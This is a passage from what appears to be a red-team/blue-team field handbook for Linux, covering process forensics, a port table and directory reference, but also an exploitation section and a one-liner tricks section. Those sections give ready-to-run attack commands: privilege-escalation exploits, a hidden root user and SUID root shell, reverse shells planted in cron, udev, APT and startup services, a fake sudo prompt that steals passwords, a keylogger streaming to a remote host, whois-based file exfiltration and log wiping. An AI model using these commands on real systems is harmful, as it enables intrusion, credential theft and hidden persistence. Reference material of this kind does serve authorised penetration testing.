Process Command Line Information

cat /proc/[PID]/cmdline
cat /proc/[PID]/comm

NOTE: Significant differences in the above 2 outputs and the

specified binary name under /proc/[PID]/exe can be indicative of
malicious software attempting to remain undetected.

Process Environment Variables

NOTE: Includes user who ran binary
strings /proc/[PID]/environ
cat /proc/[PID]/environ

Process File Descriptors/Maps

126
NOTE: Shows what the process is ‘accessing’ or using
ls -al /proc/[PID]/fd
cat /proc/[PID]/maps

Process Stack/Status Information

NOTE: May reveal useful elements
cat /proc/[PID]/stack
cat /proc/[PID]/status

Show Deleted Binaries Currently Running

ls -alr /proc/*/exe 2> /dev/null | grep deleted

Process Working Directories

NOTE: Including common targeted directories for malicious activity
ls -alr /proc/*/cwd
ls -alr /proc/*/cwd 2> /dev/null | grep tmp
ls -alr /proc/*/cwd 2> /dev/null | grep dev
ls -alr /proc/*/cwd 2> /dev/null | grep var
ls -alr /proc/*/cwd 2> /dev/null | grep home

MEMORY FORENSICS
Dump Memory
dd if=/dev/kmem of=/root/kmem
dd if=/dev/mem of=/root/mem

LiME
[Link]
sudo insmod ./[Link] "path=./[Link] format=raw"

Capture Disk Image

fdisk -l
dd if=/dev/sda1 of=/[outputlocation]

REFERENCE:
[Link]
[Link]
forensics-for-incident-responders/
[Link]
collection

L L
LINUX_Exploit
RED TEAM EXPLOITATION Linux

127
 LINENUM
Scripted local Linux enumeration and privilege escalation checks.
NOTE: You must place this script on the target host.

Summary of Categories Performed:

Kernel and Distribution
System Information
User Information
Privileged access
Environmental
Jobs/Tasks
Services
Version Information
Default/Weak Credentials
Useful File Searches
Platform/software tests

Full host enumeration with report output into tmp

[Link] -s -r [Link] -e /tmp/ -t

Direct execution one-liners

bash <(wget -q -O -
[Link]
.sh) -r [Link] -e /tmp/ -t -i

bash <(curl -s
[Link]
.sh) -r [Link] -e /tmp/ -t -i

REFERENCE:
[Link]

BeROOT
BeRoot is a post exploitation tool to check common
misconfigurations on Linux and Mac OS to find a way to escalate our
privilege. "linux-exploit-suggester" is embedded in this project.
NOTE: You must place this script on the target host.

Summary of Categories Performed:

GTFOBins
Wildcards
Sensitive files
Services
Suid binaries
Path Environment variable
NFS Root Squashing
LD_PRELOAD
Sudoers file
Sudo list
Python Library Hijacking

128
Capabilities
Ptrace Scope
Exploit Suggest

Basic enumeration
#Without user password
python [Link]

#If you have a user password

python [Link] --password <PASS>

REFERENCE:
[Link]

LINUX-SMART-ENUMERATION
Linux enumeration tool for pentesting and CTFs with verbosity
levels.
NOTE: You must place this script on the target host.

Summary of Categories Performed:

User related tests.
Sudo related tests.
File system related tests.
System related tests.
Security measures related tests.
Recurrent tasks (cron, timers) related tests.
Network related tests.
Services related tests.
Processes related tests.
Software related tests.
Container (docker, lxc) related tests.

Basic enumeration execution

[Link]

Increase verbosity and enumeration information

[Link] -l1

Dump everything that can be gathered from the host

[Link] -l2

One-liner download & chmod

wget "[Link]
enumeration/raw/master/[Link]" -O [Link];chmod 700 [Link]

129
curl "[Link]
enumeration/raw/master/[Link]" -Lo [Link];chmod 700 [Link]

Direct execution one-liner

bash <(wget -q -O - [Link]
treitos/linux-smart-enumeration/master/[Link]) -l2 -i

bash <(curl -s [Link]

treitos/linux-smart-enumeration/master/[Link]) -l1 -i

REFERENCE:
[Link]

COMMON EXPLOITS
CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8
[Link]

CVE-2010-4258 - Linux Kernel <= 2.6.37 'Full-Nelson.c'

[Link]

CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo /

Ubuntu x86/x64)
[Link]
wget -O exploit.c <[Link]
gcc -o mempodipper exploit.c
./mempodipper

CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux

Kernel <= 3.19.0-73.8
[Link]
[Link]
[Link]
#Compile dirty cow:
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow [Link] -
lutil

CVE-2010-3904 - RDS Protocol - Linux 2.6.32

[Link]

Cross-compiling Exploit w/ GCC

#(32 bit)
gcc -m32 -o hello_32 hello.c
#(64 bit)
gcc -m64 -o hello_64 hello.c

PERSISTENCE

130
Create A Root User
sudo useradd -ou 0 -g 0 john
sudo passwd john
echo "linuxpassword" | passwd --stdin john

SUID Binary
TMPDIR2="/var/tmp"
echo 'int main(void){setresuid(0, 0, 0);system("/bin/sh");}' >
$TMPDIR2/croissant.c
gcc $TMPDIR2/croissant.c -o $TMPDIR2/croissant 2>/dev/null
rm $TMPDIR2/croissant.c
chown root:root $TMPDIR2/croissant
chmod 4777 $TMPDIR2/croissant

Crontab - Reverse shell

(crontab -l ; echo "@reboot sleep 200 && ncat [Link] 4242 -e
/bin/bash")|crontab 2> /dev/null

Backdoor Target User .bashrc

TMPNAME2=".systemd-private-b21245afee3b3274d4b2e2-systemd-
[Link]-IgCBE0"
cat << EOF > /tmp/$TMPNAME2
alias sudo='locale=$(locale | grep LANG | cut -d= -f2 | cut -d_ -
f1);if [ \$locale = "en" ]; then echo -n "[sudo] password for
\$USER: ";fi;if [ \$locale = "fr" ]; then echo -n "[sudo] Mot de
passe de \$USER: ";fi;read -s pwd;echo; unalias sudo; echo "\$pwd"
| /usr/bin/sudo -S nohup nc -lvp 1234 -e /bin/bash > /dev/null &&
/usr/bin/sudo -S '
EOF
if [ -f ~/.bashrc ]; then
cat /tmp/$TMPNAME2 >> ~/.bashrc
fi
if [ -f ~/.zshrc ]; then
cat /tmp/$TMPNAME2 >> ~/.zshrc
fi
rm /tmp/$TMPNAME2
#OR add the following line inside Target user .bashrc file:
$ chmod u+x ~/.hidden/fakesudo
$ echo "alias sudo=~/.hidden/fakesudo" >> ~./bashrc
#then create the fakesudo script.
read -sp "[sudo] password for $USER: " sudopass
echo ""
sleep 2
echo "Sorry, try again."
echo $sudopass >> /tmp/[Link]

/usr/bin/sudo $@

Backdoor Startup Service

131
RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\"
2>/dev/null"
sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart

Backdoor Target User Startup File

First write a file in ~/.config/autostart/NAME_OF_FILE.desktop
#vi file ~/.config/autostart/*.desktop and add the below:

[Desktop Entry]
Type=Application
Name=Welcome
Exec=/var/lib/gnome-welcome-tour
AutostartCondition=unless-exists ~/.cache/gnome-getting-started-
docs/seen-getting-started-guide
OnlyShowIn=GNOME;
X-GNOME-Autostart-enabled=false

Backdoor Driver
echo
"ACTION==\"add\",ENV{DEVTYPE}==\"usb_device\",SUBSYSTEM==\"usb\",RU
N+=\"$RSHELL\"" | tee /etc/udev/rules.d/71-vbox-kernel-
[Link] > /dev/null

Backdoor [Link].D
Create file in [Link].d directory:
APT::Update::Pre-Invoke {"CMD"};
When Target runs "apt-get update" your CMD will be executed.

#Example Ncat CMD

echo 'APT::Update::Pre-Invoke {"nohup ncat -lvp 1234 -e /bin/bash
2> /dev/null &"};' > /etc/apt/[Link].d/42backdoor

Linux Privilege Escalation MindMap

132
 COVER TRACKS
Reset logfile to 0 without having to restart syslogd etc:
cat /dev/null > /var/log/[Link]

Clear terminal history

cat /dev/null > ~/.bash_history
history -c
export HISTFILESIZE=0
export HISTSIZE=0
unset HISTFILE

REFERENCE:
[Link]
[Link]
[Link]
[Link]
[Link]
%20and%20Resources/Linux%20-%20Privilege%[Link]
[Link]
%20and%20Resources/Linux%20-%[Link]
[Link]

L L
LINUX_Hardening
BLUE TEAM CONFIGURATION Linux

LINUX HARDENING GUIDE

[Link]
x/ERNW_Hardening_Linux.md

133
L L
LINUX_Ports
ALL INFORMATIONAL Linux

PORT APP_PROTOCOL SYSTEM SERVICE

1 TCP tcpmux TCP port service multiplexer
5 TCP rje Remote Job Entry
7 TCP echo Echo service
9 TCP discard Null service for connection
testing
11 TCP systat System Status service for
listing connected ports
13 TCP daytime Sends date and time to
requesting host
15 tcp netstat Network Status (netstat)
17 TCP qotd Sends quote of the day to
connected host
18 TCP msp Message Send Protocol
19 TCP chargen Character Generation
service; sends endless
stream of characters
20 TCP ftp-data FTP data port
21 TCP ftp File Transfer Protocol (FTP)
port; sometimes used by File
Service Protocol (FSP)
22 TCP ssh Secure Shell (SSH) service
23 TCP telnet The Telnet service
25 TCP smtp Simple Mail Transfer
Protocol (SMTP)
37 TCP time Time Protocol
39 TCP rlp Resource Location Protocol
42 TCP nameserver Internet Name Service
43 TCP nicname WHOIS directory service
49 TCP tacacs Terminal Access Controller
Access Control System for
TCP/IP based authentication
and access
50 TCP re-mail-ck Remote Mail Checking
Protocol
53 TCP domain domain name services (such
as BIND)
63 TCP whois++ WHOIS++, extended WHOIS
services
67 TCP bootps Bootstrap Protocol (BOOTP)
services;Dynamic Host

134
 Configuration Protocol
(DHCP) services
68 TCP bootpc Bootstrap (BOOTP) client;
Dynamic Host Control
Protocol (DHCP) clients
69 TCP tftp Trivial File Transfer
Protocol (TFTP)
70 TCP gopher Gopher Internet document
search and retrieval
71 TCP netrjs-1 Remote Job Service
72 TCP netrjs-2 Remote Job Service
73 TCP netrjs-3 Remote Job Service
73 TCP netrjs-4 Remote Job Service
79 TCP finger Finger service for user
contact information
80 TCP http HyperText Transfer Protocol
(HTTP) for World Wide Web
(WWW) services
88 TCP kerberos Kerberos network
authentication system
95 TCP supdup Telnet protocol extension
98 tcp linuxconf Linuxconf Linux
administration tool
101 TCP hostname Hostname services on SRI-NIC
machines
102 TCP iso-tsap ISO Development Environment
(ISODE) network applications
105 TCP csnet-ns Mailbox nameserver; also
used by CSO nameserver
106 poppassd Post Office Protocol
password change daemon
(POPPASSD)
107 TCP rtelnet Remote Telnet
109 TCP pop2 Post Office Protocol version
2
110 TCP POP3 Post Office Protocol version
3
111 TCP sunrpc Remote Procedure Call (RPC)
Protocol for remote command
execution, used by Network
Filesystem (NFS)
113 TCP auth Authentication and Ident
protocols
115 TCP sftp Secure File Transfer
Protocol (SFTP) services
117 TCP uucp-path Unix-to-Unix Copy Protocol
(UUCP) Path services
119 TCP nntp Network News Transfer
Protocol (NNTP) for the
USENET discussion system

135
123 TCP ntp Network Time Protocol (NTP)
137 TCP netbios-ns NETBIOS Name Service used in
Red Hat Enterprise Linux by
Samba
138 TCP netbios-dgm NETBIOS Datagram Service
used in Red Hat Enterprise
Linux by Samba
139 TCP netbios-ssn NETBIOS Session Service used
in Red Hat Enterprise Linux
by Samba
143 TCP IMAP Internet Message Access
Protocol (IMAP)
161 TCP snmp Simple Network Management
Protocol (SNMP)
162 TCP snmptrap Traps for SNMP
163 TCP cmip-man Common Management
Information Protocol (CMIP)
164 TCP cmip-agent Common Management
Information Protocol (CMIP)
174 TCP mailq MAILQ email transport queue
177 TCP xdmcp X Display Manager Control
Protocol (XDMCP)
178 TCP nextstep NeXTStep window server
179 TCP bgp Border Gateway Protocol
191 TCP prospero Prospero distributed
filesystem services
194 TCP irc Internet Relay Chat (IRC)
199 TCP smux SNMP UNIX Multiplexer
201 TCP at-rtmp AppleTalk routing
202 TCP at-nbp AppleTalk name binding
204 TCP at-echo AppleTalk echo
206 TCP at-zis AppleTalk zone information
209 TCP qmtp Quick Mail Transfer Protocol
(QMTP)
210 TCP z39.50 NISO Z39.50 database
213 TCP ipx Internetwork Packet Exchange
(IPX), a datagram protocol
commonly used in Novell
Netware environments
220 TCP IMAP3 Internet Message Access
Protocol version 3
245 TCP link LINK / 3-DNS iQuery service
347 TCP fatserv FATMEN file and tape
management server
363 TCP rsvp_tunnel RSVP Tunnel
369 TCP rpc2portmap Coda file system portmapper
370 TCP codaauth2 Coda file system
authentication services
372 TCP ulistproc UNIX LISTSERV

136
389 TCP ldap Lightweight Directory Access
Protocol (LDAP)
427 TCP svrloc Service Location Protocol
(SLP)
434 TCP mobileip-agent Mobile Internet Protocol
(IP) agent
435 TCP mobilip-mn Mobile Internet Protocol
(IP) manager
443 TCP https Secure Hypertext Transfer
Protocol (HTTP)
444 TCP snpp Simple Network Paging
Protocol
445 TCP microsoft-ds Server Message Block (SMB)
over TCP/IP
464 TCP kpasswd Kerberos password and key
changing services
465 tcp smtps Simple Mail Transfer
Protocol over Secure Sockets
Layer (SMTPS)
468 TCP photuris Photuris session key
management protocol
487 TCP saft Simple Asynchronous File
Transfer (SAFT) protocol
488 TCP gss-http Generic Security Services
(GSS) for HTTP
496 TCP pim-rp-disc Rendezvous Point Discovery
(RP-DISC) for Protocol
Independent Multicast (PIM)
services
500 TCP isakmp Internet Security
Association and Key
Management Protocol (ISAKMP)
512 TCP exec Authentication for remote
process execution
512 UDP biff [comsat] Asynchrous mail client
(biff) and service (comsat)
513 TCP login Remote Login (rlogin)
513 UDP who [whod] whod user logging daemon
514 TCP shell [cmd] Remote shell (rshell) and
remote copy (rcp) with no
logging
514 UDP syslog UNIX system logging service
515 printer [spooler] Line printer (lpr) spooler
517 UDP talk Talk remote calling service
and client
518 UDP ntalk Network talk (ntalk) remote
calling service and client
519 utime [unixtime] UNIX time (utime) protocol
520 TCP efs Extended Filename Server
(EFS)

137
520 UDP router [route, Routing Information Protocol
routed] (RIP)
521 ripng Routing Information Protocol
for Internet Protocol
version 6 (IPv6)
525 timed [timeserver] Time daemon (timed)
526 TCP tempo [newdate] Tempo
530 TCP courier [rpc] Courier Remote Procedure
Call (RPC) protocol
531 TCP conference [chat] Internet Relay Chat
532 netnews Netnews newsgroup service
533 UDP netwall Netwall for emergency
broadcasts
535 TCP iiop Internet Inter-Orb Protocol
(IIOP)
538 TCP gdomap GNUstep Distributed Objects
Mapper (GDOMAP)
540 TCP uucp [uucpd] UNIX-to-UNIX copy services
543 TCP klogin Kerberos version 5 (v5)
remote login
544 TCP kshell Kerberos version 5 (v5)
remote shell
546 TCP dhcpv6-client Dynamic Host Configuration
Protocol (DHCP) version 6
client
547 TCP dhcpv6-server Dynamic Host Configuration
Protocol (DHCP) version 6
Service
548 afpovertcp Appletalk Filing Protocol
(AFP) over Transmission
Control Protocol (TCP)
554 TCP rtsp Real Time Stream Control
Protocol (RTSP)
556 remotefs Brunhoff’s Remote Filesystem
[rfs_server, rfs] (RFS)
563 TCP nntps Network News Transport
Protocol over Secure Sockets
Layer (NNTPS)
565 TCP whoami whoami user ID listing
587 TCP submission Mail Message Submission
Agent (MSA)
610 TCP npmp-local Network Peripheral
Management Protocol (NPMP)
local / Distributed Queueing
System (DQS)
611 TCP npmp-gui Network Peripheral
Management Protocol (NPMP)
GUI / Distributed Queueing
System (DQS)

138
612 TCP hmmp-ind HyperMedia Management
Protocol (HMMP) Indication /
DQS
616 tcp gii Gated (routing daemon)
Interactive Interface
631 TCP ipp Internet Printing Protocol
(IPP)
636 TCP ldaps Lightweight Directory Access
Protocol over Secure Sockets
Layer (LDAPS)
674 TCP acap Application Configuration
Access Protocol (ACAP)
694 TCP ha-cluster Heartbeat services for High-
Availability Clusters
749 TCP kerberos-adm Kerberos version 5 (v5)
‘kadmin’ database
administration
750 TCP kerberos-iv Kerberos version 4 (v4)
services
765 TCP webster Network Dictionary
767 TCP phonebook Network Phonebook
808 omirr [omirrd] Online Mirror (Omirr) file
mirroring services
871 tcp supfileserv Software Upgrade Protocol
(SUP) server
873 TCP rsync rsync file transfer services
901 tcp swat Samba Web Administration
Tool (SWAT)
953 rndc Berkeley Internet Name
Domain version 9 (BIND 9)
remote configuration tool
992 TCP telnets Telnet over Secure Sockets
Layer (TelnetS)
993 TCP IMAPS Internet Message Access
Protocol over Secure Sockets
Layer (IMAPS)
994 TCP ircs Internet Relay Chat over
Secure Sockets Layer (IRCS)
995 TCP POP3s Post Office Protocol version
3 over Secure Sockets Layer
(POP3S)
1080 socks SOCKS network application
proxy services
1127 tcp supfiledbg Software Upgrade Protocol
(SUP) debugging
1178 tcp skkserv Simple Kana to Kanji (SKK)
Japanese input server
1236 bvcontrol [rmtcfg] Remote configuration server
for Gracilis Packeten
network switches[a]

139
1300 h323hostcallsc H.323 telecommunication Host
Call Secure
1313 tcp xtel French Minitel text
information system
1433 ms-sql-s Microsoft SQL Server
1434 ms-sql-m Microsoft SQL Monitor
1494 ica Citrix ICA Client
1512 wins Microsoft Windows Internet
Name Server
1524 ingreslock Ingres Database Management
System (DBMS) lock services
1525 prospero-np Prospero non-privileged
1529 tcp support [prmsd, GNATS bug tracking system
gnatsd]
1645 datametrics [old- Datametrics / old radius
radius] entry
1646 sa-msg-port sa-msg-port / old radacct
[oldradacct] entry
1649 kermit Kermit file transfer and
management service
1701 l2tp [l2f] Layer 2 Tunneling Protocol
(LT2P) / Layer 2 Forwarding
(L2F)
1718 h323gatedisc H.323 telecommunication
Gatekeeper Discovery
1719 h323gatestat H.323 telecommunication
Gatekeeper Status
1720 h323hostcall H.323 telecommunication Host
Call setup
1758 tftp-mcast Trivial FTP Multicast
1759 UDP mtftp Multicast Trivial FTP
(MTFTP)
1789 hello Hello router communication
protocol
1812 radius Radius dial-up
authentication and
accounting services
1813 radius-acct Radius Accounting
1911 mtp Starlight Networks
Multimedia Transport
Protocol (MTP)
1985 hsrp Cisco Hot Standby Router
Protocol
1986 licensedaemon Cisco License Management
Daemon
1997 gdp-port Cisco Gateway Discovery
Protocol (GDP)
2003 tcp cfinger GNU finger
2049 nfs [nfsd] Network File System (NFS)

140
2102 zephyr-srv Zephyr distributed messaging
Server
2103 zephyr-clt Zephyr client
2104 zephyr-hm Zephyr host manager
2150 ninstall Network Installation Service
2401 cvspserver Concurrent Versions System
(CVS) client/server
operations
2430 TCP venus Venus cache manager for Coda
file system (codacon port)
2430 UDP venus Venus cache manager for Coda
file system (callback/wbc
interface)
2431 TCP venus-se Venus Transmission Control
Protocol (TCP) side effects
2431 UDP venus-se Venus User Datagram Protocol
(UDP) side effects
2432 UDP codasrv Coda file system server port
2433 TCP codasrv-se Coda file system TCP side
effects
2433 UDP codasrv-se Coda file system UDP SFTP
side effect
2600 hpstgmgr [zebrasrv] Zebra routing[b]
2601 discp-client discp client; Zebra
[zebra] integrated shell
2602 discp-server [ripd] discp server; Routing
Information Protocol daemon
(ripd)
2603 servicemeter Service Meter; RIP daemon
[ripngd] for IPv6
2604 nsc-ccs [ospfd] NSC CCS; Open Shortest Path
First daemon (ospfd)
2605 nsc-posa NSC POSA; Border Gateway
Protocol daemon (bgpd)
2606 netmon [ospf6d] Dell Netmon; OSPF for IPv6
daemon (ospf6d)
2809 corbaloc Common Object Request Broker
Architecture (CORBA) naming
service locator
2988 afbackup afbackup client-server
backup system
3128 tcp squid Squid Web proxy cache
3130 icpv2 Internet Cache Protocol
version 2 (v2); used by
Squid proxy caching server
3306 mysql MySQL database service
3346 trnsprntproxy Transparent proxy
3455 prsvp RSVP port
4011 pxe Pre-execution Environment
(PXE) service

141
4321 rwhois Remote Whois (rwhois)
service
4444 krb524 Kerberos version 5 (v5) to
version 4 (v4) ticket
translator
4557 tcp fax FAX transmission service
(old service)
4559 tcp hylafax HylaFAX client-server
protocol (new service)
5002 rfe Radio Free Ethernet (RFE)
audio broadcasting system
5232 sgi-dgl SGI Distributed Graphics
Library
5308 cfengine Configuration engine
(Cfengine)
5354 noclog NOCOL network operation
center logging daemon
(noclogd)
5355 hostmon NOCOL network operation
center host monitoring
5432 postgres PostgreSQL database
5680 tcp canna Canna Japanese character
input interface
5999 cvsup [CVSup] CVSup file transfer and
update tool
6000 TCP x11 [X] X Window System services
6010 tcp x11-ssh-offset Secure Shell (SSH) X11
forwarding offset
6667 ircd Internet Relay Chat daemon
(ircd)
7000 afs3-fileserver Andrew File System (AFS)
file server
7001 afs3-callback AFS port for callbacks to
cache manager
7002 afs3-prserver AFS user and group database
7003 afs3-vlserver AFS volume location database
7004 afs3-kaserver AFS Kerberos authentication
service
7005 afs3-volser AFS volume management server
7006 afs3-errors AFS error interpretation
service
7007 afs3-bos AFS basic overseer process
7008 afs3-update AFS server-to-server updater
7009 afs3-rmtsys AFS remote cache manager
service
7100 tcp xfs X Font Server (XFS)
7666 tcp tircproxy Tircproxy IRC proxy service
8008 http-alt Hypertext Tranfer Protocol
(HTTP) alternate

142
8080 webcache World Wide Web (WWW) caching
service
8081 tproxy Transparent Proxy
9100 tcp jetdirect Hewlett-Packard (HP)
[laserjet, hplj] JetDirect network printing
service
9359 mandelspawn Parallel mandelbrot spawning
[mandelbrot] program for the X Window
System
9876 sd Session Director for IP
multicast conferencing
10080 amanda Advanced Maryland Automatic
Network Disk Archiver
(Amanda) backup services
10081 kamanda Amanda backup service over
Kerberos
10082 tcp amandaidx Amanda index server
10083 tcp amidxtape Amanda tape server
11371 pgpkeyserver Pretty Good Privacy (PGP) /
GNU Privacy Guard (GPG)
public keyserver
11720 h323callsigalt H.323 Call Signal Alternate
13720 bprd Veritas NetBackup Request
Daemon (bprd)
13721 bpdbm Veritas NetBackup Database
Manager (bpdbm)
13722 bpjava-msvc Veritas NetBackup Java /
Microsoft Visual C++ (MSVC)
protocol
13724 vnetd Veritas network utility
13782 bpcd Veritas NetBackup
13783 vopied Veritas VOPIE authentication
daemon
20011 isdnlog Integrated Services Digital
Network (ISDN) logging
system
20012 vboxd ISDN voice box daemon
(vboxd)
22273 wnn6 [wnn4] Kana/Kanji conversion system
22289 tcp wnn4_Cn cWnn Chinese input system
22305 tcp wnn4_Kr kWnn Korean input system
22321 tcp wnn4_Tw tWnn Chinese input system
(Taiwan)
24554 binkp Binkley TCP/IP Fidonet
mailer daemon
26000 quake Quake (and related) multi-
player game servers
26208 wnn6-ds Wnn6 Kana/Kanji server
27374 asp Address Search Protocol

143
 33434 traceroute Traceroute network tracking
tool
60177 tfido Ifmail FidoNet compatible
mailer service
60179 fido FidoNet electronic mail and
news network

REFERENCE:
[Link]

L L
LINUX_Structure
ALL INFORMATIONAL Linux

DIRECTORY DESCRIPTIONS
Primary hierarchy root and root directory of
/ the entire file system hierarchy.
Essential command binaries that need to be
available in single user mode; for all users,
/bin e.g., cat, ls, cp.

/boot Boot loader files, e.g., kernels, initrd.

Device files, e.g., /dev/null, /dev/disk0,
/dev /dev/sda1, /dev/tty, /dev/random.
/etc Host-specific system-wide configuration files.
Configuration files for add-on packages that
/etc/opt are stored in /opt.
Configuration files, such as catalogs, for
/etc/sgml software that processes SGML.
Configuration files for the X Window System,
/etc/X11 version 11.
Configuration files, such as catalogs, for
/etc/xml software that processes XML.
Users' home directories, containing saved
/home files, personal settings, etc.
Libraries essential for the binaries in /bin
/lib and /sbin.
Alternative format essential libraries. Such
directories are optional, but if they exist,
/lib<qual> they have some requirements.
/media

144
 Mount points for removable media such as CD-
ROMs.

/mnt Temporarily mounted filesystems.

/opt Optional application software packages.

Virtual filesystem providing process and
kernel information as files. In Linux,
corresponds to a procfs mount. Generally
automatically generated and populated by the
/proc system, on the fly.

/root Home directory for the root user.

Run-time variable data: Information about the
running system since last boot, e.g.,
currently logged-in users and running daemons.
Files under this directory must be either
removed or truncated at the beginning of the
boot process; but this is not necessary on
systems that provide this directory as a
/run temporary filesystem (tmpfs).
Essential system binaries, e.g., fsck, init,
/sbin route.
Site-specific data served by this system, such
as data and scripts for web servers, data
offered by FTP servers, and repositories for
version control systems (appeared in FHS-2.3
/srv in 2004).
Contains information about devices, drivers,
/sys and some kernel features.
Temporary files (see also /var/tmp). Often not
preserved between system reboots, and may be
/tmp severely size restricted.
Secondary hierarchy for read-only user data;
contains the majority of (multi-)user
/usr utilities and applications.
Non-essential command binaries (not needed in
/usr/bin single user mode); for all users.

/usr/include Standard include files.

Libraries for the binaries in /usr/bin and
/usr/lib /usr/sbin.
Alternative format libraries, e.g. /usr/lib32
for 32-bit libraries on a 64-bit machine
/usr/lib<qual> (optional).

145
 Tertiary hierarchy for local data, specific to
this host. Typically has further
/usr/local subdirectories, e.g., bin, lib, share.
Non-essential system binaries, e.g., daemons
/usr/sbin for various network-services.

/usr/share Architecture-independent (shared) data.

Source code, e.g., the kernel source code with
/usr/src its header files.
X Window System, Version 11, Release 6 (up to
/usr/X11R6 FHS-2.3, optional).
Variable files—files whose content is expected
to continually change during normal operation
of the system—such as logs, spool files, and
/var temporary e-mail files.
Application cache data. Such data are locally
generated as a result of time-consuming I/O or
calculation. The application must be able to
regenerate or restore the data. The cached
/var/cache files can be deleted without loss of data.
State information. Persistent data modified by
programs as they run, e.g., databases,
/var/lib packaging system metadata, etc.
Lock files. Files keeping track of resources
/var/lock currently in use.

/var/log Log files. Various logs.

Mailbox files. In some distributions, these
files may be located in the deprecated
/var/mail /var/spool/mail.
Variable data from add-on packages that are
/var/opt stored in /opt.
Run-time variable data. This directory
contains system information data describing
/var/run the system since it was booted.
Spool for tasks waiting to be processed, e.g.,
/var/spool print queues and outgoing mail queue.

/var/spool/mail Deprecated location for users' mailboxes.

Temporary files to be preserved between
/var/tmp reboots.

IMPORTANT FILE LOCATIONS

146
/boot/vmlinuz : The Linux Kernel file.
/dev/had : Device file for the first IDE HDD (Hard Disk Drive)
/dev/hdc : Device file for the IDE Cdrom, commonly
/dev/null : A pseudo device
/etc/bashrc : System defaults and aliases used by bash shell.
/etc/crontab : Cron run commands on a predefined time Interval.
/etc/exports : Information of the file system available on network.
/etc/fstab : Information of Disk Drive and their mount point.
/etc/group : Information of Security Group.
/etc/[Link] : grub bootloader configuration file.
/etc/init.d : Service startup Script.
/etc/[Link] : lilo bootloader configuration file.
/etc/hosts : Information on IP's and corresponding hostnames.
/etc/[Link] : Hosts allowed access to services on local host.
/etc/[Link] : Hosts denied access to services on local host.
/etc/inittab : INIT process and interactions at various run level.
/etc/issue : Allows to edit the pre-login message.
/etc/[Link] : Configuration files for system modules.
/etc/motd : Message Of The Day
/etc/mtab : Currently mounted blocks information.
/etc/passwd : System users with password hash redacted.
/etc/printcap : Printer Information
/etc/profile : Bash shell defaults
/etc/profile.d : Application script, executed after login.
/etc/rc.d : Information about run level specific script.
/etc/rc.d/init.d : Run Level Initialisation Script.
/etc/[Link] : Domain Name Servers (DNS) being used by System.
/etc/securetty : Terminal List, where root login is possible.
/etc/shadow : System users with password hash.
/etc/skel : Script that populates new user home directory.
/etc/termcap : ASCII file defines the behavior of Terminal.
/etc/X11 : Configuration files of X-window System.
/usr/bin : Normal user executable commands.
/usr/bin/X11 : Binaries of X windows System.
/usr/include : Contains include files used by ‘c‘ program.
/usr/share : Shared directories of man files, info files, etc.
/usr/lib : Library files required during program compilation.
/usr/sbin : Commands for Super User, for System Administration.
/proc/cpuinfo : CPU Information
/proc/filesystems : File-system information being used currently.
/proc/interrupts : Information about the current interrupts.
/proc/ioports : All Input/Output addresses used by devices.
/proc/meminfo : Memory Usages Information.
/proc/modules : Currently used kernel module.
/proc/mount : Mounted File-system Information.
/proc/stat : Detailed Statistics of the current System.
/proc/swaps : Swap File Information.
/version : Linux Version Information.
/var/log/auth* : Log of authorization login attempts.
/var/log/lastlog : Log of last boot process.

147
/var/log/messages : Log of messages produced by syslog daemon.
/var/log/wtmp : login time and duration of each user on the system.

REFERENCE:
[Link]
[Link]
EWPRz2770K4/edit
[Link]
paths-explained/

L L
LINUX_Tricks
ALL MISC Linux

EXFIL TRICK
WHOIS Exfil Files
First: Ncat listen & tee to file
ncat -k -l -p 4444 | tee files.b64

Next: Compress, base64, xarg whois to Ncat listener

tar czf - /bin/* | base64 | xargs -I bits timeout 0.03 whois -h
[Link] -p 4444 bits

Finally: Reconstruct files back

cat files.b64 | tr -d '\r\n' | base64 -d | tar zxv

ONE-LINERS
Linux in-memory exec one-liner
This command will execute a bash script in memory from a remote
server. Works w/ noexec
bash -c CMD="`wget -qO- [Link] && eval "$CMD"

Bash IP/Port Scanner

for i in {1..65535};do (echo </dev/tcp/<TargetIPAddr>/$i)
&>/dev/null && echo -e "\n[+] Open port at:\t$i" || (echo -n
"."&&exit 1);done

Bash one-liner screenshot web services running on an IP range

IP="192.168.0"; for p in '80' '443'; do for i in $(seq 0 5); do
TAKE_SS=$(cutycapt --url=$IP.$i:$p --out=$IP.$i:$[Link]); done; done

Add to .bashrc - Log history of commands with timestamp

148
PS1='[`date +"%d-%b-%y %T"`] > 'test "$(ps -ocommand= -p $PPID |
awk '{print $1}')" == 'script' || (script -f $HOME/logs/$(date
+"%d-%b-%y_%H-%M-%S")_shell.log)

One-Lin3r Terminal Aid

Gives you one-liners that aids in penetration testing operations,
privilege escalation and more [Link]
[Link]

Bash Keylogger
PROMPT_COMMAND='history -a; tail -n1 ~/.bash_history >
/dev/tcp/[Link]/9000'

One liner to add persistence on a box via cron

echo "* * * * * /bin/nc [Link] 1234 -e /bin/bash" > cron &&
crontab cron
and on [Link]
nc -lvp 1234

One-liner to check if the contents of a directory changed:

find . -type f | sort | xargs sha1sum | sha1sum | awk '{print $1}'

Shodan Bash One-Liner to Search

for domain in $(curl <raw target domains file>| unfurl -u format
'%r');do shodan search <INSERT_VULN_HERE> "ssl:$domain" | awk
'{print $1}' | aquatone;done

One-liner for grabbing all of the IP addresses from any ASN:

whois -h [Link] -- '-i origin AS36459' | grep -Eo "([0-
9.]+){4}/[0-9]+" | uniq

Show 10 Largest Open Files

lsof / | awk '{ if($7 > 1048576) print $7/1048576 "MB" " " $9 " "
$1 }' | sort -n -u | tail

Generate a sequence of numbers

echo {01..10}

Displays the quantity of connections to port 80 on a per IP basis

clear;while x=0; do clear;date;echo "";echo " [Count] | [IP
ADDR]";echo "-------------------";netstat -np|grep :80|grep -v
LISTEN|awk '{print $5}'|cut -d: -f1|uniq -c; sleep 5;done

Nmap scan every interface that is assigned an IP

ifconfig -a | grep -Po '\b(?!255)(?:\d{1,3}\.){3}(?!255)\d{1,3}\b'
| xargs nmap -A -p0-

149
Rename all items in a directory to lower case
for i in *; do mv "$i" "${i,,}"; done

Find all log files modified 24 hours ago, and zip them
find . -type f -mtime +1 -name "*.log" -exec zip -m {}.zip {} \;
>/dev/null

List IP addresses connected to your server on port 80

